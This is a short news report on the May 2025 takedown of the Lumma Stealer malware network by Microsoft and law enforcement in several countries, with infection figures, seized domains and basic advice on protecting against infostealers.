Microsoft, in collaboration with global law enforcement, successfully dismantled the Lumma Stealer malware network in May 2025. This action follows the tracking of infections on over 394,000 Windows devices between March 16 and May 16, 2025. Lumma Stealer, a Malware-as-a-Service (MaaS), has been sold on underground forums since 2022 and became a favored tool for cybercriminals.
The malware was used to steal login credentials, credit card numbers, and cryptocurrency wallet data. Microsoft obtained a court order to take down approximately 2,300 malicious domains supporting Lumma's infrastructure. The U.S. Department of Justice seized control of Lumma's core command system and disrupted the marketplaces where the tool was sold.
International cooperation was crucial in the takedown. Japan's Cybercrime Control Center (JC3) facilitated the suspension of locally based Lumma infrastructure. Europol assisted in actions against hundreds of domains. This joint action is designed to slow down cybercriminals, making it challenging for them to rebuild their infrastructure.
To protect against infostealer malware, users should be skeptical of CAPTCHA prompts and use strong antivirus software. Enabling two-factor authentication and keeping devices updated are also crucial steps. Microsoft's takedown of Lumma Stealer is a significant victory in combating data breaches fueled by infostealers.